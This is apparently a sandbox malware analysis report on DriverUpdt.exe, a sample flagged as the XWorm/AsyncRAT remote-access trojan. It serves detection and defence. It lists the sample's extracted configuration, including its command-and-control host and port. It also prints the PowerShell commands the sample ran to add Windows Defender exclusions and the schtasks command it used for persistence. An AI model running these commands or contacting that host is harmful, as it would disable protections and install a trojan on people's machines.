Windows Analysis Report
DriverUpdt.exe

Overview

General Information

Sample name:DriverUpdt.exe
Analysis ID:1465719
MD5:65485b0475b6c8a3b4f35bba541938a6
SHA1:28e6e6cd2ebf8a9fdffeb4aeba13b70ea7ea03a3
SHA256:c6740ee5c8afdc2c7be42fb03ab5a346925efc6ac785fe7d68dec2d5f05d276b
Tags:exe

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DriverUpdt.exe (PID: 5520 cmdline: "C:\Users\user\Desktop\DriverUpdt.exe" MD5: 65485B0475B6C8A3B4F35BBA541938A6)
    • powershell.exe (PID: 7084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 348 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\DriverUpdt' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DriverUpdt' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6172 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • DriverUpdt (PID: 3008 cmdline: C:\Users\user\AppData\Roaming\DriverUpdt MD5: 65485B0475B6C8A3B4F35BBA541938A6)
  • OpenWith.exe (PID: 4712 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 4676 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 5856 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • DriverUpdt (PID: 4768 cmdline: C:\Users\user\AppData\Roaming\DriverUpdt MD5: 65485B0475B6C8A3B4F35BBA541938A6)
  • cleanup

Malware Configuration (Xworm):
{"C2 url": ["stewiegriffin-37537.portmap.host"], "Port": "37537", "Aes key": "37537", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Yara matches on the submitted sample

Source | Rule | Description | Author | Strings
DriverUpdt.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
DriverUpdt.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
DriverUpdt.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0xf809:$s6: VirtualBox
  • 0xf767:$s8: Win32_ComputerSystem
  • 0x13526:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x135c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x136d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x123b2:$cnc4: POST / HTTP/1.1

Yara matches on dropped files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\DriverUpdt | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Roaming\DriverUpdt | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\DriverUpdt | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0xf809:$s6: VirtualBox
  • 0xf767:$s8: Win32_ComputerSystem
  • 0x13526:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x135c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x136d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x123b2:$cnc4: POST / HTTP/1.1

Yara matches on memory dumps

Source | Rule | Description | Author | Strings
00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000002.3310295199.0000000012FF1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0x10281:$s6: VirtualBox
  • 0x101df:$s8: Win32_ComputerSystem
  • 0x13f9e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1403b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x14150:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x12e2a:$cnc4: POST / HTTP/1.1
00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.2026730895.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0xf609:$s6: VirtualBox
  • 0xf567:$s8: Win32_ComputerSystem
  • 0x13326:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x133c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x134d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x121b2:$cnc4: POST / HTTP/1.1
00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Yara matches on unpacked PEs

Source | Rule | Description | Author | Strings
0.0.DriverUpdt.exe.df0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.DriverUpdt.exe.df0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.0.DriverUpdt.exe.df0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0xf809:$s6: VirtualBox
  • 0xf767:$s8: Win32_ComputerSystem
  • 0x13526:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x135c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x136d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x123b2:$cnc4: POST / HTTP/1.1
0.2.DriverUpdt.exe.12ff1a78.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.2.DriverUpdt.exe.12ff1a78.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | see below
  • 0xda09:$s6: VirtualBox
  • 0xd967:$s8: Win32_ComputerSystem
  • 0x11726:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x117c3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x118d8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x105b2:$cnc4: POST / HTTP/1.1

                      System Summary

                      barindex
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', ProcessId: 7084, ProcessName: powershell.exe
Source: Process started, Author: frack113, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', ProcessId: 7084, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\DriverUpdt, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\DriverUpdt.exe, ProcessId: 5520, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdt
Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: C:\Users\user\AppData\Roaming\DriverUpdt, CommandLine: C:\Users\user\AppData\Roaming\DriverUpdt, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\DriverUpdt, NewProcessName: C:\Users\user\AppData\Roaming\DriverUpdt, OriginalFileName: C:\Users\user\AppData\Roaming\DriverUpdt, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\DriverUpdt, ProcessId: 3008, ProcessName: DriverUpdt
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', ProcessId: 7084, ProcessName: powershell.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: EventID: 11, Image: C:\Users\user\Desktop\DriverUpdt.exe, ProcessId: 5520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DriverUpdt.lnk
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DriverUpdt" /tr "C:\Users\user\AppData\Roaming\DriverUpdt", ProcessId: 6172, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DriverUpdt.exe", ParentImage: C:\Users\user\Desktop\DriverUpdt.exe, ParentProcessId: 5520, ParentProcessName: DriverUpdt.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DriverUpdt.exe', ProcessId: 7084, ProcessName: powershell.exe
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4676, ProcessName: svchost.exe
                      No Snort rule has matched

                      AV Detection

                      barindex
Source: DriverUpdt.exe, Avira: detected
Source: stewiegriffin-37537.portmap.host, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\DriverUpdt, Avira: detection malicious, Label: TR/Spy.Gen
Source: DriverUpdt.exe, Malware Configuration Extractor: Xworm {"C2 url": ["stewiegriffin-37537.portmap.host"], "Port": "37537", "Aes key": "37537", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Roaming\DriverUpdt, ReversingLabs: Detection: 84%
Source: DriverUpdt.exe, ReversingLabs: Detection: 84%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\DriverUpdt, Joe Sandbox ML: detected
Source: DriverUpdt.exe, Joe Sandbox ML: detected
Source: DriverUpdt.exe, String decryptor: stewiegriffin-37537.portmap.host
Source: DriverUpdt.exe, String decryptor: 37537
Source: DriverUpdt.exe, String decryptor: catfart
Source: DriverUpdt.exe, String decryptor: <Xwormmm>
Source: DriverUpdt.exe, String decryptor: gurry
Source: DriverUpdt.exe, String decryptor: USB.exe
Source: DriverUpdt.exe, String decryptor: %AppData%
Source: DriverUpdt.exe, String decryptor: DriverUpdt
Source: DriverUpdt.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DriverUpdt.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
Source: Malware configuration extractor, URLs: stewiegriffin-37537.portmap.host
Source: Yara match, File source: DriverUpdt.exe, type: SAMPLE
Source: Yara match, File source: 0.0.DriverUpdt.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.DriverUpdt.exe.12ff1a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: C:\Users\user\AppData\Roaming\DriverUpdt, type: DROPPED
Source: global traffic, TCP traffic: 192.168.2.5:49714 -> 193.161.193.99:37537
Source: global traffic, HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 208.95.112.1
Source: Joe Sandbox View, IP Address: 193.161.193.99
Source: Joe Sandbox View, ASN Name: TUT-ASUS
Source: Joe Sandbox View, ASN Name: BITREE-ASRU
Source: unknown, DNS query: name: ip-api.com
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: global traffic, DNS traffic detected: DNS query: ip-api.com
Source: global traffic, DNS traffic detected: DNS query: stewiegriffin-37537.portmap.host
Source: powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.m
Source: powershell.exe, 00000005.00000002.2227719144.00000135E1DF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.2227719144.00000135E1DF5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000005.00000002.2225891671.00000135E1C30000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micros
Source: powershell.exe, 0000000A.00000002.2583865294.0000014E38E00000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.microsp
Source: svchost.exe, 00000012.00000002.3276702426.000001BA75A0F000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.ver)
Source: qmgr.db.18.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.18.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.18.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.18.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.18.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.18.dr, String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.18.dr, String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: DriverUpdt.exe, DriverUpdt.0.dr, String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.2119512647.0000029C6C39F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2209288191.00000135D96FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359742614.0000019A7675F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2102983893.0000029C5C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C98B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A66AA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: DriverUpdt.exe, 00000000.00000002.3278221040.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2102983893.0000029C5C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C9691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A666F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E20711000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2102983893.0000029C5C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C98B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A66AA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.2385082051.0000019A7EEF8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 0000000A.00000002.2586638323.0000014E39008000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://www.microsoom/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl0l
Source: powershell.exe, 00000002.00000002.2102983893.0000029C5C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2153166994.00000135C9691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2265756719.0000019A666F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2418918680.0000014E20711000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: edb.log.18.dr, qmgr.db.18.dr, String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000012.00000003.2732456791.000001BA75820000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.dr, String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 0000000A.00000002.2418918680.0000014E2093A000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2127592677.0000029C74A39000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ion=v4.5mConsumererv
Source: powershell.exe, 00000002.00000002.2119512647.0000029C6C39F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2209288191.00000135D96FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2359742614.0000019A7675F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2552881667.0000014E3077E000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.18.dr, String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

                      Operating System Destruction

                      barindex
Source: C:\Users\user\Desktop\DriverUpdt.exe, Process information set: 01 00 00 00

                      System Summary

                      barindex
Source: DriverUpdt.exe, type: SAMPLE | Matched rule: Detects AsyncRAT, Author: ditekSHen
